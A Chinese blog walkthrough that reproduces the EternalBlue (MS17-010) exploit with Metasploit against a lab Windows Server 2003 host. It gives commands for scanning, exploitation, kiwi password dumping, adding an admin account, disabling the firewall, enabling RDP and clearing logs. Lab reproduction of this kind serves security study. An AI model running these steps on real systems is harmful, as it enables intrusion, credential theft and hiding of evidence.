当前位置: 首页 > article >正文

永恒之蓝ms17_010漏洞复现及利用

永恒之蓝——windows server 2003 漏洞

windows server 2003 系统提权_msfconsole 对iwn2003提权可以利用那些漏洞-CSDN博客

MS17-010永恒之蓝-漏洞利用+修复方法_ms17010漏洞利用-CSDN博客

简述:

永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

SMB协议简述:

SMB(全称是Server MessageBlock)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

SMB工作原理:

1、首先客户端发送一个SMB negport请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信;

2、协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接;

3、当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconXSMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝;

4、连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

复现漏洞

启动msf:msfconsole

image.png

这样就成功进入了msf中,如果你的界面与该界面不同,不必诧异,msf每次都会有一个随机的界面

可使用banner更换界面

搜索ms17_010

search ms17_010

image.png

尽量使用rank高的

image.png

验证漏洞模块

使用验证漏洞 auxilliary辅助模块

use auxiliary/scanner/smb/smb_ms17_010
show options   //输入options来获得帮助命令

image.png

RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描

扫描靶机(windows 2003 )

set rhosts 192.168.28.146

image.png

run 或者 exploit //开始执行扫描

image.png

出现以上情况(+号代表脆弱),存在漏洞 即445端口开放

漏洞利用模块

back返回继续search查找

image.png

使用windows 2003的攻击模块

use exploit/windows/smb/ms17_010_eternalblue

image.png

进行查缺并set

show missings
set rhosts 192.168.28.146

image.png

run 或者 exploit //开始攻击

image.png

发现几次都失败了,这时我们换个exploit载荷

use exploit/windows/smb/ms17_010_psexec

image.png

诶 好了 巧了嘛不是 成功了

Kali操控server2003

screenshot获取屏幕数据

image.png

image.png

获取密码

meterpreter > load kiwi //加载kiwi模块

image.png

meterpreter > creds_all //列举系统中的明文密码

image.png

shell控制

image.png

出现乱码使用chcp 65001命令

远程控制

添加用户net user 用户名 密码 /add

net user qgg 123456 /add

image.png

查看本地用户信息:

net user

image.png

添加为管理员用户

net localgroup administrators qgg /add

确认添加成功,并提升至管理员权限

net user qgg

确认是否提权成功

image.png

关闭防火墙

netsh firewall set opmode mode=disable
netsh firewall set opmode disable

查看防火墙状态:

netsh firewall show state
Netsh Advfirewall show allprofiles

image.png

查看开启的端口

netstat -ano

image.png

开启3389端口(如果3389没有开启)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d  00000000 /f

查看 3389 端口

netstat -aon | findstr “3389”

image.png

远程桌面连接

rdesktop + ip 地址

image.png

rdesktop -f -a 16 192.168.28.146

image.png

命令验证

image.png

日志清理

找到事件查看器

image.png

image.png

使用clearev清理日志

image.png

干干净净,very good,下班

image.png

会话保留和下次利用

不能用exit退出,会中断会话用background

sessions -l             //列出会话
sessions -i id号        //访问会话

image.png

http://www.lryc.cn/news/2420777.html

相关文章:

  • DNN、RNN、CNN.…..一文带你读懂这些绕晕人的名词
  • 32位MCU抢食医疗电子市场
  • 冰桶算法
  • 代码注入
  • 运维管理平台 - 自动部署salt被控端minion
  • 最新坦白说破解方法!!!
  • 跨学科的AI量化其实很简单
  • 判断入射满射c语言编码,例4,判断下列函数是否是满射、单射、双射。.PDF
  • 打造我们心中永恒的m500
  • 武汉Uber优步司机奖励政策(8月31日~9月6日)
  • eccv 2020_为什么我停止使用gan eccv2020
  • 你管这破玩意叫操作系统源码 | 第一回 最开始的两行代码
  • Ubuntu命令全集
  • fabric 智能合约开发
  • 1024分辨率《圣徒/天神魔煞/猎魔教士》BD中字无水印
  • day 09--函数和模块
  • 列名 userid 不明确。 存储过程_写给高二美术生:如果你还不知道这些问题,那你就惨了!...
  • python实现抢票github_面向回家编程!GitHub标星两万的”Python抢票教程”,我们先帮你跑了一遍...
  • 英语阅读积累一
  • js中文转拼音插件源码
  • 2022-3-12 【webrtc应用】yangrtc/metaRTC开源库源码分析(一)
  • 知识见闻 - 苏州旅游
  • Html 中表格导出生成excel文件,解决中文导出失败问题。
  • 陈继儒 -- 《小窗幽记》
  • 摩托罗拉发布最新款Android 3.0平板电脑Xoom
  • Android仿抖音主页效果实现
  • Tinywebserver-一个简易的web服务器
  • 项目管理术语中英文对照
  • 男生vs女生,谁更加适合做软件测试?—我觉得男生更胜一筹!
  • 一键评教,查询成绩,批量免验证码选课,退课,-云大urp教务系统大作战(3)...